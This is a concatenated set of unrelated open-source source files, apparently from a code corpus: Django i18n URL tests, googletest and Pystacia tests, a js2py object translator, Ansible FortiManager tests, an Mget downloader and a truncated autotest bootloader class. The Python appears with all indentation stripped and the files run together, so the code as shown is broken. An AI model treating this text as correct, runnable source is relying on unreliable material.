self.assertEqual(reverse('prefixed'), '/prefixed/')
@override_settings(ROOT_URLCONF='i18n.patterns.urls.path_unused')
class PathUnusedTests(URLTestCaseBase):
"""
Check that if no i18n_patterns is used in root urlconfs, then no
language activation happens based on url prefix.
"""
def test_no_lang_activate(self):
response = self.client.get('/nl/foo/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['content-language'], 'en')
self.assertEqual(response.context['LANGUAGE_CODE'], 'en')
class URLTranslationTests(URLTestCaseBase):
"""
Tests if the pattern-strings are translated correctly (within the
`i18n_patterns` and the normal `patterns` function).
"""
def test_no_prefix_translated(self):
with translation.override('en'):
self.assertEqual(reverse('no-prefix-translated'), '/translated/')
self.assertEqual(reverse('no-prefix-translated-slug', kwargs={'slug': 'yeah'}), '/translated/yeah/')
with translation.override('nl'):
self.assertEqual(reverse('no-prefix-translated'), '/vertaald/')
self.assertEqual(reverse('no-prefix-translated-slug', kwargs={'slug': 'yeah'}), '/vertaald/yeah/')
with translation.override('pt-br'):
self.assertEqual(reverse('no-prefix-translated'), '/traduzidos/')
self.assertEqual(reverse('no-prefix-translated-slug', kwargs={'slug': 'yeah'}), '/traduzidos/yeah/')
def test_users_url(self):
with translation.override('en'):
self.assertEqual(reverse('users'), '/en/users/')
with translation.override('nl'):
self.assertEqual(reverse('users'), '/nl/gebruikers/')
self.assertEqual(reverse('prefixed_xml'), '/nl/prefixed.xml')
with translation.override('pt-br'):
self.assertEqual(reverse('users'), '/pt-br/usuarios/')
def test_translate_url_utility(self):
with translation.override('en'):
self.assertEqual(translate_url('/en/non-existent/', 'nl'), '/en/non-existent/')
self.assertEqual(translate_url('/en/users/', 'nl'), '/nl/gebruikers/')
# Namespaced URL
self.assertEqual(translate_url('/en/account/register/', 'nl'), '/nl/profiel/registeren/')
self.assertEqual(translation.get_language(), 'en')
with translation.override('nl'):
self.assertEqual(translate_url('/nl/gebruikers/', 'en'), '/en/users/')
self.assertEqual(translation.get_language(), 'nl')
class URLNamespaceTests(URLTestCaseBase):
"""
Tests if the translations are still working within namespaces.
"""
def test_account_register(self):
with translation.override('en'):
self.assertEqual(reverse('account:register'), '/en/account/register/')
with translation.override('nl'):
self.assertEqual(reverse('account:register'), '/nl/profiel/registeren/')
class URLRedirectTests(URLTestCaseBase):
"""
Tests if the user gets redirected to the right URL when there is no
language-prefix in the request URL.
"""
def test_no_prefix_response(self):
response = self.client.get('/not-prefixed/')
self.assertEqual(response.status_code, 200)
def test_en_redirect(self):
response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='en')
self.assertRedirects(response, '/en/account/register/')
response = self.client.get(response['location'])
self.assertEqual(response.status_code, 200)
def test_en_redirect_wrong_url(self):
response = self.client.get('/profiel/registeren/', HTTP_ACCEPT_LANGUAGE='en')
self.assertEqual(response.status_code, 404)
def test_nl_redirect(self):
response = self.client.get('/profiel/registeren/', HTTP_ACCEPT_LANGUAGE='nl')
self.assertRedirects(response, '/nl/profiel/registeren/')
response = self.client.get(response['location'])
self.assertEqual(response.status_code, 200)
def test_nl_redirect_wrong_url(self):
response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='nl')
self.assertEqual(response.status_code, 404)
def test_pt_br_redirect(self):
response = self.client.get('/conta/registre-se/', HTTP_ACCEPT_LANGUAGE='pt-br')
self.assertRedirects(response, '/pt-br/conta/registre-se/')
response = self.client.get(response['location'])
self.assertEqual(response.status_code, 200)
def test_pl_pl_redirect(self):
# language from outside of the supported LANGUAGES list
response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='pl-pl')
self.assertRedirects(response, '/en/account/register/')
response = self.client.get(response['location'])
self.assertEqual(response.status_code, 200)
@override_settings(
MIDDLEWARE_CLASSES=[
'i18n.patterns.tests.PermanentRedirectLocaleMiddleWare',
'django.middleware.common.CommonMiddleware',
],
)
def test_custom_redirect_class(self):
response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='en')
self.assertRedirects(response, '/en/account/register/', 301)
class URLVaryAcceptLanguageTests(URLTestCaseBase):
"""
Tests that 'Accept-Language' is not added to the Vary header when using
prefixed URLs.
"""
def test_no_prefix_response(self):
response = self.client.get('/not-prefixed/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get('Vary'), 'Accept-Language')
def test_en_redirect(self):
response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='en')
self.assertRedirects(response, '/en/account/register/')
self.assertFalse(response.get('Vary'))
response = self.client.get(response['location'])
self.assertEqual(response.status_code, 200)
self.assertFalse(response.get('Vary'))
class URLRedirectWithoutTrailingSlashTests(URLTestCaseBase):
"""
Tests the redirect when the requested URL doesn't end with a slash
(`settings.APPEND_SLASH=True`).
"""
def test_not_prefixed_redirect(self):
response = self.client.get('/not-prefixed', HTTP_ACCEPT_LANGUAGE='en')
self.assertRedirects(response, '/not-prefixed/', 301)
def test_en_redirect(self):
response = self.client.get('/account/register', HTTP_ACCEPT_LANGUAGE='en', follow=True)
# We only want one redirect, bypassing CommonMiddleware
self.assertListEqual(response.redirect_chain, [('/en/account/register/', 302)])
self.assertRedirects(response, '/en/account/register/', 302)
response = self.client.get('/prefixed.xml', HTTP_ACCEPT_LANGUAGE='en', follow=True)
self.assertRedirects(response, '/en/prefixed.xml', 302)
class URLRedirectWithoutTrailingSlashSettingTests(URLTestCaseBase):
"""
Tests the redirect when the requested URL doesn't end with a slash
(`settings.APPEND_SLASH=False`).
"""
@override_settings(APPEND_SLASH=False)
def test_not_prefixed_redirect(self):
response = self.client.get('/not-prefixed', HTTP_ACCEPT_LANGUAGE='en')
self.assertEqual(response.status_code, 404)
@override_settings(APPEND_SLASH=False)
def test_en_redirect(self):
response = self.client.get('/account/register-without-slash', HTTP_ACCEPT_LANGUAGE='en')
self.assertRedirects(response, '/en/account/register-without-slash', 302)
response = self.client.get(response['location'])
self.assertEqual(response.status_code, 200)
class URLResponseTests(URLTestCaseBase):
"""
Tests if the response has the right language-code.
"""
def test_not_prefixed_with_prefix(self):
response = self.client.get('/en/not-prefixed/')
self.assertEqual(response.status_code, 404)
def test_en_url(self):
response = self.client.get('/en/account/register/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['content-language'], 'en')
self.assertEqual(response.context['LANGUAGE_CODE'], 'en')
def test_nl_url(self):
response = self.client.get('/nl/profiel/registeren/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['content-language'], 'nl')
self.assertEqual(response.context['LANGUAGE_CODE'], 'nl')
def test_wrong_en_prefix(self):
response = self.client.get('/en/profiel/registeren/')
self.assertEqual(response.status_code, 404)
def test_wrong_nl_prefix(self):
response = self.client.get('/nl/account/register/')
self.assertEqual(response.status_code, 404)
def test_pt_br_url(self):
response = self.client.get('/pt-br/conta/registre-se/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['content-language'], 'pt-br')
self.assertEqual(response.context['LANGUAGE_CODE'], 'pt-br')
class URLRedirectWithScriptAliasTests(URLTestCaseBase):
"""
#21579 - LocaleMiddleware should respect the script prefix.
"""
def test_language_prefix_with_script_prefix(self):
prefix = '/script_prefix'
with override_script_prefix(prefix):
response = self.client.get('/prefixed/', HTTP_ACCEPT_LANGUAGE='en', SCRIPT_NAME=prefix)
self.assertRedirects(response, '%s/en/prefixed/' % prefix, target_status_code=404)
class URLTagTests(URLTestCaseBase):
"""
Test if the language tag works.
"""
def test_strings_only(self):
t = Template("""{% load i18n %}
{% language 'nl' %}{% url 'no-prefix-translated' %}{% endlanguage %}
{% language 'pt-br' %}{% url 'no-prefix-translated' %}{% endlanguage %}""")
self.assertEqual(t.render(Context({})).strip().split(),
['/vertaald/', '/traduzidos/'])
def test_context(self):
ctx = Context({'lang1': 'nl', 'lang2': 'pt-br'})
tpl = Template("""{% load i18n %}
{% language lang1 %}{% url 'no-prefix-translated' %}{% endlanguage %}
{% language lang2 %}{% url 'no-prefix-translated' %}{% endlanguage %}""")
self.assertEqual(tpl.render(ctx).strip().split(),
['/vertaald/', '/traduzidos/'])
def test_args(self):
tpl = Template("""{% load i18n %}
{% language 'nl' %}{% url 'no-prefix-translated-slug' 'apo' %}{% endlanguage %}
{% language 'pt-br' %}{% url 'no-prefix-translated-slug' 'apo' %}{% endlanguage %}""")
self.assertEqual(tpl.render(Context({})).strip().split(),
['/vertaald/apo/', '/traduzidos/apo/'])
def test_kwargs(self):
tpl = Template("""{% load i18n %}
{% language 'nl' %}{% url 'no-prefix-translated-slug' slug='apo' %}{% endlanguage %}
{% language 'pt-br' %}{% url 'no-prefix-translated-slug' slug='apo' %}{% endlanguage %}""")
self.assertEqual(tpl.render(Context({})).strip().split(),
['/vertaald/apo/', '/traduzidos/apo/'])
| bsd-3-clause |
bhargavipatel/808X_VO | vendor/googletest/googletest/test/gtest_uninitialized_test.py | 372 | 2482 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test warns the user when not initialized properly."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import gtest_test_utils
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_uninitialized_test_')
def Assert(condition):
if not condition:
raise AssertionError
def AssertEq(expected, actual):
if expected != actual:
print('Expected: %s' % (expected,))
print(' Actual: %s' % (actual,))
raise AssertionError
def TestExitCodeAndOutput(command):
"""Runs the given command and verifies its exit code and output."""
# Verifies that 'command' exits with code 1.
p = gtest_test_utils.Subprocess(command)
Assert(p.exited)
AssertEq(1, p.exit_code)
Assert('InitGoogleTest' in p.output)
class GTestUninitializedTest(gtest_test_utils.TestCase):
def testExitCodeAndOutput(self):
TestExitCodeAndOutput(COMMAND)
if __name__ == '__main__':
gtest_test_utils.Main()
| mit |
JackDandy/SickGear | lib/js2py/legecy_translators/objects.py | 4 | 11454 | """ This module removes all objects/arrays from JS source code and replace them with LVALS.
Also it has s function translating removed object/array to python code.
Use this module just after removing constants. Later move on to removing functions"""
from __future__ import print_function
OBJECT_LVAL = 'PyJsLvalObject%d_'
ARRAY_LVAL = 'PyJsLvalArray%d_'
from utils import *
from jsparser import *
from nodevisitor import exp_translator
import functions
from flow import KEYWORD_METHODS
def FUNC_TRANSLATOR(*a): # stupid import system in python
raise RuntimeError('Remember to set func translator. Thank you.')
def set_func_translator(ftrans):
# stupid stupid Python or Peter
global FUNC_TRANSLATOR
FUNC_TRANSLATOR = ftrans
def is_empty_object(n, last):
"""n may be the inside of block or object"""
if n.strip():
return False
# seems to be but can be empty code
last = last.strip()
markers = {
')',
';',
}
if not last or last[-1] in markers:
return False
return True
# todo refine this function
def is_object(n, last):
"""n may be the inside of block or object.
last is the code before object"""
if is_empty_object(n, last):
return True
if not n.strip():
return False
#Object contains lines of code so it cant be an object
if len(argsplit(n, ';')) > 1:
return False
cands = argsplit(n, ',')
if not cands[-1].strip():
return True # {xxxx,} empty after last , it must be an object
for cand in cands:
cand = cand.strip()
# separate each candidate element at : in dict and check whether they are correct...
kv = argsplit(cand, ':')
if len(
kv
) > 2: # set the len of kv to 2 because of this stupid : expression
kv = kv[0], ':'.join(kv[1:])
if len(kv) == 2:
# key value pair, check whether not label or ?:
k, v = kv
if not is_lval(k.strip()):
return False
v = v.strip()
if v.startswith('function'):
continue
#will fail on label... {xxx: while {}}
if v[0] == '{': # value cant be a code block
return False
for e in KEYWORD_METHODS:
# if v starts with any statement then return false
if v.startswith(e) and len(e) < len(v) and v[len(
e)] not in IDENTIFIER_PART:
return False
elif not (cand.startswith('set ') or cand.startswith('get ')):
return False
return True
def is_array(last):
#it can be prop getter
last = last.strip()
if any(
endswith_keyword(last, e) for e in
{'return', 'new', 'void', 'throw', 'typeof', 'in', 'instanceof'}):
return True
markers = {')', ']'}
return not last or not (last[-1] in markers or last[-1] in IDENTIFIER_PART)
def remove_objects(code, count=1):
""" This function replaces objects with OBJECTS_LVALS, returns new code, replacement dict and count.
count arg is the number that should be added to the LVAL of the first replaced object
"""
replacements = {} #replacement dict
br = bracket_split(code, ['{}', '[]'])
res = ''
last = ''
for e in br:
#test whether e is an object
if e[0] == '{':
n, temp_rep, cand_count = remove_objects(e[1:-1], count)
# if e was not an object then n should not contain any :
if is_object(n, last):
#e was an object
res += ' ' + OBJECT_LVAL % count
replacements[OBJECT_LVAL % count] = e
count += 1
else:
# e was just a code block but could contain objects inside
res += '{%s}' % n
count = cand_count
replacements.update(temp_rep)
elif e[0] == '[':
if is_array(last):
res += e # will be translated later
else: # prop get
n, rep, count = remove_objects(e[1:-1], count)
res += '[%s]' % n
replacements.update(rep)
else: # e does not contain any objects
res += e
last = e #needed to test for this stipid empty object
return res, replacements, count
def remove_arrays(code, count=1):
"""removes arrays and replaces them with ARRAY_LVALS
returns new code and replacement dict
*NOTE* has to be called AFTER remove objects"""
res = ''
last = ''
replacements = {}
for e in bracket_split(code, ['[]']):
if e[0] == '[':
if is_array(last):
name = ARRAY_LVAL % count
res += ' ' + name
replacements[name] = e
count += 1
else: # pseudo array. But pseudo array can contain true array. for example a[['d'][3]] has 2 pseudo and 1 true array
cand, new_replacements, count = remove_arrays(e[1:-1], count)
res += '[%s]' % cand
replacements.update(new_replacements)
else:
res += e
last = e
return res, replacements, count
def translate_object(obj, lval, obj_count=1, arr_count=1):
obj = obj[1:-1] # remove {} from both ends
obj, obj_rep, obj_count = remove_objects(obj, obj_count)
obj, arr_rep, arr_count = remove_arrays(obj, arr_count)
# functions can be defined inside objects. exp translator cant translate them.
# we have to remove them and translate with func translator
# its better explained in translate_array function
obj, hoisted, inline = functions.remove_functions(obj, all_inline=True)
assert not hoisted
gsetters_after = ''
keys = argsplit(obj)
res = []
for i, e in enumerate(keys, 1):
e = e.strip()
if e.startswith('set '):
gsetters_after += translate_setter(lval, e)
elif e.startswith('get '):
gsetters_after += translate_getter(lval, e)
elif ':' not in e:
if i < len(keys
): # can happen legally only in the last element {3:2,}
raise SyntaxError('Unexpected "," in Object literal')
break
else: #Not getter, setter or elision
spl = argsplit(e, ':')
if len(spl) < 2:
raise SyntaxError('Invalid Object literal: ' + e)
try:
key, value = spl
except: #len(spl)> 2
print('Unusual case ' + repr(e))
key = spl[0]
value = ':'.join(spl[1:])
key = key.strip()
if is_internal(key):
key = '%s.to_string().value' % key
else:
key = repr(key)
value = exp_translator(value)
if not value:
raise SyntaxError('Missing value in Object literal')
res.append('%s:%s' % (key, value))
res = '%s = Js({%s})\n' % (lval, ','.join(res)) + gsetters_after
# translate all the nested objects (including removed earlier functions)
for nested_name, nested_info in inline.iteritems(): # functions
nested_block, nested_args = nested_info
new_def = FUNC_TRANSLATOR(nested_name, nested_block, nested_args)
res = new_def + res
for lval, obj in obj_rep.iteritems(): #objects
new_def, obj_count, arr_count = translate_object(
obj, lval, obj_count, arr_count)
# add object definition BEFORE array definition
res = new_def + res
for lval, obj in arr_rep.iteritems(): # arrays
new_def, obj_count, arr_count = translate_array(
obj, lval, obj_count, arr_count)
# add object definition BEFORE array definition
res = new_def + res
return res, obj_count, arr_count
def translate_setter(lval, setter):
func = 'function' + setter[3:]
try:
_, data, _ = functions.remove_functions(func)
if not data or len(data) > 1:
raise Exception()
except:
raise SyntaxError('Could not parse setter: ' + setter)
prop = data.keys()[0]
body, args = data[prop]
if len(args) != 1: #setter must have exactly 1 argument
raise SyntaxError('Invalid setter. It must take exactly 1 argument.')
# now messy part
res = FUNC_TRANSLATOR('setter', body, args)
res += "%s.define_own_property(%s, {'set': setter})\n" % (lval, repr(prop))
return res
def translate_getter(lval, getter):
func = 'function' + getter[3:]
try:
_, data, _ = functions.remove_functions(func)
if not data or len(data) > 1:
raise Exception()
except:
raise SyntaxError('Could not parse getter: ' + getter)
prop = data.keys()[0]
body, args = data[prop]
if len(args) != 0: #setter must have exactly 0 argument
raise SyntaxError('Invalid getter. It must take exactly 0 argument.')
# now messy part
res = FUNC_TRANSLATOR('getter', body, args)
res += "%s.define_own_property(%s, {'get': setter})\n" % (lval, repr(prop))
return res
def translate_array(array, lval, obj_count=1, arr_count=1):
"""array has to be any js array for example [1,2,3]
lval has to be name of this array.
Returns python code that adds lval to the PY scope it should be put before lval"""
array = array[1:-1]
array, obj_rep, obj_count = remove_objects(array, obj_count)
array, arr_rep, arr_count = remove_arrays(array, arr_count)
#functions can be also defined in arrays, this caused many problems since in Python
# functions cant be defined inside literal
# remove functions (they dont contain arrays or objects so can be translated easily)
# hoisted functions are treated like inline
array, hoisted, inline = functions.remove_functions(array, all_inline=True)
assert not hoisted
arr = []
# separate elements in array
for e in argsplit(array, ','):
# translate expressions in array PyJsLvalInline will not be translated!
e = exp_translator(e.replace('\n', ''))
arr.append(e if e else 'None')
arr = '%s = Js([%s])\n' % (lval, ','.join(arr))
#But we can have more code to add to define arrays/objects/functions defined inside this array
# translate nested objects:
# functions:
for nested_name, nested_info in inline.iteritems():
nested_block, nested_args = nested_info
new_def = FUNC_TRANSLATOR(nested_name, nested_block, nested_args)
arr = new_def + arr
for lval, obj in obj_rep.iteritems():
new_def, obj_count, arr_count = translate_object(
obj, lval, obj_count, arr_count)
# add object definition BEFORE array definition
arr = new_def + arr
for lval, obj in arr_rep.iteritems():
new_def, obj_count, arr_count = translate_array(
obj, lval, obj_count, arr_count)
# add object definition BEFORE array definition
arr = new_def + arr
return arr, obj_count, arr_count
if __name__ == '__main__':
test = 'a = {404:{494:19}}; b = 303; if () {f={:}; { }}'
#print remove_objects(test)
#print list(bracket_split(' {}'))
print()
print(remove_arrays(
'typeof a&&!db.test(a)&&!ib[(bb.exec(a)||["",""], [][[5][5]])[1].toLowerCase()])'
))
print(is_object('', ')'))
| gpl-3.0 |
tersmitten/ansible | test/units/modules/network/fortimanager/test_fmgr_script.py | 39 | 4479 | # Copyright 2018 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
from ansible.module_utils.network.fortimanager.fortimanager import FortiManagerHandler
import pytest
try:
from ansible.modules.network.fortimanager import fmgr_script
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
def load_fixtures():
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures') + "/{filename}.json".format(
filename=os.path.splitext(os.path.basename(__file__))[0])
try:
with open(fixture_path, "r") as fixture_file:
fixture_data = json.load(fixture_file)
except IOError:
return []
return [fixture_data]
@pytest.fixture(autouse=True)
def module_mock(mocker):
connection_class_mock = mocker.patch('ansible.module_utils.basic.AnsibleModule')
return connection_class_mock
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortimanager.fmgr_script.Connection')
return connection_class_mock
@pytest.fixture(scope="function", params=load_fixtures())
def fixture_data(request):
func_name = request.function.__name__.replace("test_", "")
return request.param.get(func_name, None)
fmg_instance = FortiManagerHandler(connection_mock, module_mock)
def test_set_script(fixture_data, mocker):
mocker.patch("ansible.module_utils.network.fortimanager.fortimanager.FortiManagerHandler.process_request",
side_effect=fixture_data)
# Fixture sets used:###########################
##################################################
# script_content: get system status
# adom: ansible
# script_scope: None
# script_name: TestScript
# script_target: remote_device
# mode: set
# script_description: Create by Ansible
# script_package: None
# vdom: root
# script_type: cli
##################################################
# Test using fixture 1 #
output = fmgr_script.set_script(fmg_instance, fixture_data[0]['paramgram_used'])
assert output['raw_response']['status']['code'] == 0
def test_delete_script(fixture_data, mocker):
mocker.patch("ansible.module_utils.network.fortimanager.fortimanager.FortiManagerHandler.process_request",
side_effect=fixture_data)
# Fixture sets used:###########################
##################################################
# vdom: root
# script_target: None
# script_content: None
# adom: ansible
# script_description: None
# script_package: None
# mode: delete
# script_scope: None
# script_name: TestScript
# script_type: None
##################################################
# Test using fixture 1 #
output = fmgr_script.delete_script(fmg_instance, fixture_data[0]['paramgram_used'])
assert output['raw_response']['status']['code'] == 0
def test_execute_script(fixture_data, mocker):
mocker.patch("ansible.module_utils.network.fortimanager.fortimanager.FortiManagerHandler.process_request",
side_effect=fixture_data)
# Fixture sets used:###########################
##################################################
# script_content: None
# adom: ansible
# script_scope: FGT1
# script_name: TestScript
# script_target: None
# mode: exec
# script_description: None
# script_package: None
# vdom: root
# script_type: None
##################################################
# Test using fixture 1 #
output = fmgr_script.execute_script(fmg_instance, fixture_data[0]['paramgram_used'])
assert isinstance(output['raw_response'], dict) is True
| gpl-3.0 |
squeaky-pl/pystacia | pystacia/tests/__init__.py | 1 | 2858 | # coding: utf-8
# pystacia/tests/__init__.py
# Copyright (C) 2011-2012 by Paweł Piotr Przeradowski
# This module is part of Pystacia and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from __future__ import with_statement
try:
from warnings import catch_warnings, simplefilter
except ImportError:
pass
from tempfile import mkstemp
from pystacia.tests.common import TestCase, skipIf
from pystacia.image.sample import lena_available
class Lena(TestCase):
@skipIf(not lena_available(), 'Lena not available')
def test(self):
img = image.lena()
self.assertEqual(img.size, (512, 512))
self.assertEqual(img.type, types.truecolor)
img.close()
img = image.lena(32)
self.assertEqual(img.size, (32, 32))
img.close()
from sys import version_info
class DeprecationTest(TestCase):
@skipIf(version_info < (2, 6), 'Catching warnings not available')
def test(self):
import pystacia
from pystacia import image
with catch_warnings(record=True) as w:
simplefilter('always')
self.assertTrue(image.blank(30, 30).
is_same(pystacia.blank(30, 30)))
self.assertTrue('blank' in w[-1].message.args[0])
if lena_available():
self.assertTrue(image.lena().is_same(pystacia.lena()))
self.assertTrue('lena' in w[-1].message.args[0])
tmpname = mkstemp()[1] + '.bmp'
img = sample()
img.write(tmpname)
self.assertTrue(pystacia.read(tmpname).
is_same(image.read(tmpname)))
self.assertTrue('read' in w[-1].message.args[0])
self.assertTrue(pystacia.read_blob(img.get_blob('bmp')).
is_same(image.read_blob(img.get_blob('bmp'))))
self.assertTrue(pystacia.read_raw(**img.get_raw('rgb')).
is_same(image.read_raw(**img.get_raw('rgb'))))
img.close()
for symbol in ['magick_logo', 'wizard',
'netscape', 'granite', 'rose']:
self.assertTrue(getattr(image, symbol)().
is_same(getattr(pystacia, symbol)()))
self.assertTrue(symbol in w[-1].message.args[0])
self.assertIsInstance(pystacia.Image(), image.Image)
names = ['composites', 'types', 'filters', 'colorspaces',
'compressions', 'axes']
for name in names:
self.assertEqual(getattr(pystacia, name).x,
getattr(image, name).x)
self.assertTrue(name in w[-1].message.args[0])
from pystacia import image
from pystacia.image import types
from pystacia.tests.common import sample
| mit |
MGet/mget | build/lib.linux-x86_64-3.5/Mget/downloader/common.py | 6 | 3835 | #!/usr/bin/env python3
import os, sys
import time
from ..utils import (std, strip_site, MGet, urlparse, HTMLParser)
class FileDownloader(MGet):
def __init__(self, info = {}):
self.last_len = 0
self.alt_prog = 0.0
def getLocalFilesize(self, filename):
tmp_name = self.temp_name(filename)
if os.path.exists(filename): return os.path.getsize(os.path.join('.', filename))
elif os.path.exists(tmp_name): return os.path.getsize(os.path.join('.', tmp_name))
else: return None
def flush_bar (self, result = []):
line = "".join(["%s" % x for x in result])
if self.info.get('newline'): sys.stdout.write('\n')
else: sys.stdout.write('\r')
if self.last_len: sys.stdout.write('\b' * self.last_len)
sys.stdout.write("\r")
sys.stdout.write(line)
sys.stdout.flush()
self.last_len = len(line)
def _progress_bar(self, s_dif = None, progress = None, bytes = None, dif = None, width = 46):
width = self.get_term_width() - width
data_len = (self.cursize - self.resume_len)
quit_size = (self.quit_size / 100.0)
if progress > quit_size: quit_size = progress
prog = int(progress * width)
prog_bal = width - int(progress * width)
if self.quit_size != 100.0:
expect = int(quit_size * width)
ex_bal = int((width - expect) - 2)
ex_prog_bal = int(expect - int(progress * width))
progress_bar = "["+"="*(prog)+">"+" "*(ex_prog_bal)+"]["+" "*(ex_bal)+"] "
else:
progress_bar = "["+"="*(prog)+">"+" "*(prog_bal)+"] "
_res = ["%-6s" % ("{0:.1f}%".format(float(progress) * 100.0)), progress_bar,
"%-12s " % ("{:02,}".format(self.cursize)),
"%9s " % (self.calc_speed(dif,bytes).decode()),
"eta "+ self.calc_eta(s_dif, bytes, data_len, self.remaining).decode()]
self.flush_bar (_res)
def progress_bar_2(self, s_dif = None, progress = None, bytes = None, dif = None, width = 48):
width = self.get_term_width() - width
prog = int(self.alt_prog * width)
prog_bal = width - int(self.alt_prog * width)
progress_bar = "[" + " " * (prog) + "<=>" + " " * (prog_bal) + "] "
_res = [ "(^_^) " if int(self.alt_prog * 10) in list(range(0, 10, 4)) else "(0_0) ",
progress_bar, "%-12s " % ("{:02,}".format(self.cursize)),
"%9s%12s" % (self.calc_speed(dif,bytes).decode()," ")]
self.flush_bar (_res)
if self.alt_prog < 0.1: self.reach_end = False
if self.alt_prog == 1.0: self.reach_end = True
if self.alt_prog < 1.0 and not self.reach_end: self.alt_prog += 0.1
else: self.alt_prog -= 0.1
def _progress(self): return self.get_progress(self.cursize, self.filesize)
def temp_name (self, filename):
if self.info.get('nopart', False) or\
(os.path.exists(filename) and not os.path.isfile(filename)):
return filename
return filename + ".part"
def undo_temp_name (self, filename):
if filename.endswith (".part"): return filename[:-len(".part")]
return filename
def try_rename (self, old_filename, new_filename):
try:
if old_filename == new_filename: return
os.rename (old_filename, new_filename)
except (IOError, OSError) as err:
common.report ('Unable to rename file: %s' % str(err))
class MyHTMLParser(HTMLParser):
def __init__(self, html, tag = {}, hostname = None):
HTMLParser.__init__(self)
self.data = {}
self.start_tag = tag
self.hostname = hostname
self.html = html
def load(self):
self.feed(self.html)
self.close()
def handle_starttag(self, tag, attrs):
if tag not in self.start_tag: return
for name, value in attrs:
if name in self.name or value in self.value:
hostname, site = strip_site(value)
if hostname in std.site_list:
self.data[self.hostname] = value
def get_result(self, tag, name=None, value=None):
self.start_tag = tag
self.name = name or ''
self.value = value or ''
self.load()
if self.hostname in self.data:
return self.data[self.hostname]
else: return
| gpl-2.0 |
yochow/autotest | server/hosts/bootloader.py | 1 | 5567 | #
# Copyright 2007 Google Inc. Released under the GPL v2
"""
This module defines the Bootloader class.
Bootloader: a program to boot Kernels on a Host.
"""
import os, sys, weakref
from autotest_lib.client.common_lib import error
from autotest_lib.server import utils
BOOTTOOL_SRC = '../client/tools/boottool' # Get it from autotest client
class Bootloader(object):
"""
This class represents a bootloader.
It can be used to add a kernel to the list of kernels that can be
booted by a bootloader. It can also make sure that this kernel will
be the one chosen at next reboot.
"""
def __init__(self, host, xen_mode=False):
super(Bootloader, self).__init__()
self._host = weakref.ref(host)
self._boottool_path = None
self.xen_mode = xen_mode
def get_type(self):
return self._run_boottool('--bootloader-probe').stdout.strip()
def get_architecture(self):
return self._run_boottool('--arch-probe').stdout.strip()
def get_titles(self):
return self._run_boottool('--info all | grep title | '
'cut -d " " -f2-').stdout.strip().split('\n')
def get_default_title(self):
default = int(self.get_default())
return self.get_titles()[default]
def get_default(self):
return self._run_boottool('--default').stdout.strip()
def _get_info(self, info_id):
retval = self._run_boottool('--info=%s' % info_id).stdout
results = []
info = {}
for line in retval.splitlines():
if not line.strip():
if info:
results.append(info)
info = {}
else:
key, val = line.split(":", 1)
info[key.strip()] = val.strip()
if info:
results.append(info)
return results
def get_info(self, index):
results = self._get_info(index)
if results:
return results[0]
else:
return {}
def get_all_info(self):
return self._get_info('all')
def set_default(self, index):
assert(index is not None)
if self._host().job:
self._host().job.last_boot_tag = None
self._run_boottool('--set-default=%s' % index)
# 'kernel' can be a position number or a title
def add_args(self, kernel, args):
parameters = '--update-kernel=%s --args="%s"' % (kernel, args)
#add parameter if this is a Xen entry
if self.xen_mode:
parameters += ' --xen'
self._run_boottool(parameters)
def add_xen_hypervisor_args(self, kernel, args):
self._run_boottool('--xen --update-xenhyper=%s --xha="%s"' \
% (kernel, args))
def remove_args(self, kernel, args):
params = '--update-kernel=%s --remove-args="%s"' % (kernel, args)
#add parameter if this is a Xen entry
if self.xen_mode:
params += ' --xen'
self._run_boottool(params)
def remove_xen_hypervisor_args(self, kernel, args):
self._run_boottool('--xen --update-xenhyper=%s '
